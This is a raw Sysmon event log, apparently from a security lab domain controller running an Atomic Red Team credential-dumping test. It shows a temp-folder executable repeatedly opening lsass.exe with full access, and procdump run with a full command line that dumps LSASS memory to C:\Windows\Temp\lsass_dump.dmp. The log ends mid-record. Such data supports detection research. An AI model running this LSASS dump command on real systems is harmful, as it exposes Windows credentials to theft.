21:10:18.250{4DB9351A-A339-60D3-5306-00000000CF01}5972716C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 824800x800000000000000025508Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.202{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exe64920x00000277FAAD082C-- 10341000x800000000000000025507Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.202{4DB9351A-A339-60D3-5306-00000000CF01}5972716C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 824800x800000000000000025506Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.171{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exe20960x00000277FAAD082C-- 10341000x800000000000000025505Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.171{4DB9351A-A339-60D3-5306-00000000CF01}5972716C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 824800x800000000000000025504Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.140{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exe64160x00000277FAAD082C-- 10341000x800000000000000025503Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.140{4DB9351A-A339-60D3-5306-00000000CF01}5972716C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 824800x800000000000000025502Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.124{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exe64840x00000277FAAD082C-- 10341000x800000000000000025501Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.124{4DB9351A-A339-60D3-5306-00000000CF01}5972716C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 824800x800000000000000025500Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.077{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exe13000x00000277FAAD082C-- 10341000x800000000000000025499Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.077{4DB9351A-A339-60D3-5306-00000000CF01}5972716C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 824800x800000000000000025498Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.046{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exe47720x00000277FAAD082C-- 10341000x800000000000000025497Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:18.046{4DB9351A-A339-60D3-5306-00000000CF01}5972716C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 824800x800000000000000025496Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.999{4DB9351A-A339-60D3-5306-00000000CF01}5972C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exe9200x00000277FAAD082C-- 10341000x800000000000000025495Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.999{4DB9351A-A339-60D3-5306-00000000CF01}5972716C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+6c4f|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+2788|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+bf4a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c51d|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+c61a|C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe+b0ee|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000025580Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:19.749{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CAC17D3A542B0ADF9377542B39412472,SHA256=C5134DCE5710330AD2049C9A99C90D733EC323354812B96AC43E07003799153E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025579Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:19.656{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBBF54EFEFDBFAE15004D8CD69DD78E5,SHA256=A6F536D4C97F5F5DBFAD4DBA2D46272CD343D2CB05F8C1F9A67D5AAE82EB3892,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025578Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:19.609{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3461D7D0DD6BD387BFC06394F2FFDB37,SHA256=2629B75AF396965C0CC696959187D92A73C86D853F3B8A6A9ABF272CC006199B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025577Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:19.531{4DB9351A-A33B-60D3-5606-00000000CF01}11765144C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ntdll.dll+6cd0a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\SYSTEM32\dbgcore.DLL+15a38|C:\Windows\SYSTEM32\dbgcore.DLL+e3f5|C:\Windows\SYSTEM32\dbgcore.DLL+b027|C:\Windows\SYSTEM32\dbgcore.DLL+5db1|C:\Windows\SYSTEM32\dbgcore.DLL+67d3|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+13110|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+12b45|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+12a65|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+12722|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000025576Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:19.421{4DB9351A-A33B-60D3-5606-00000000CF01}1176C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exeC:\Windows\Temp\lsass_dump.dmp2021-06-23 21:10:19.421 10341000x800000000000000025575Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:19.421{4DB9351A-A33B-60D3-5606-00000000CF01}11761688C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe+7f7b|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000025574Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localAlert,Sysinternals Tool UsedSetValue2021-06-23 21:10:19.421{4DB9351A-A33B-60D3-5606-00000000CF01}1176C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exeHKU\S-1-5-21-229316442-2325824265-1712718341-500\SOFTWARE\Sysinternals\ProcDump\EulaAcceptedDWORD (0x00000001) 10341000x800000000000000025573Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:19.374{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A33B-60D3-5606-00000000CF01}1176C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025572Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:19.343{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025571Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:19.343{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A33B-60D3-5606-00000000CF01}1176C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025570Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:19.343{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025569Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:19.343{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025568Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:19.343{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025567Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:19.343{4DB9351A-A33A-60D3-5506-00000000CF01}36925712C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe{4DB9351A-A33B-60D3-5606-00000000CF01}1176C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe+8a5b|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe+7800|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x800000000000000025566Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:19.351{4DB9351A-A33B-60D3-5606-00000000CF01}1176C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe10.0Sysinternals process dump utilityProcDumpSysinternals - www.sysinternals.comprocdumpC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F13DAB7D9CE88DDC0C80C2B9C5F422B5,SHA256=E2A7A9A803C6A4D2D503BB78A73CD9951E901BEB5FB450A2821EAF740FC48496,IMPHASH=E6F7F291413118F49398761021BAFCF2{4DB9351A-A33A-60D3-5506-00000000CF01}3692C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exeC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp 11241100x800000000000000025565Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:10:19.343{4DB9351A-A33A-60D3-5506-00000000CF01}3692C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exeC:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe2021-06-23 21:10:19.343 10341000x800000000000000025564Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:19.328{4DB9351A-A33A-60D3-5506-00000000CF01}36925712C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe+7661|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 13241300x800000000000000025563Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localAlert,Sysinternals Tool UsedSetValue2021-06-23 21:10:19.203{4DB9351A-A33A-60D3-5506-00000000CF01}3692C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exeHKU\S-1-5-21-229316442-2325824265-1712718341-500\SOFTWARE\Sysinternals\ProcDump\EulaAcceptedDWORD (0x00000001) 23542300x800000000000000025581Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:20.656{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B4C034B314EED4D43870651D812044E,SHA256=70C9BD02ADFE18D715A09C66299D78E56D10010C89CEACA4D19C72D2F8AA9314,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025605Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.906{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A33D-60D3-5706-00000000CF01}3604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025604Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.906{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A33D-60D3-5706-00000000CF01}3604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025603Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 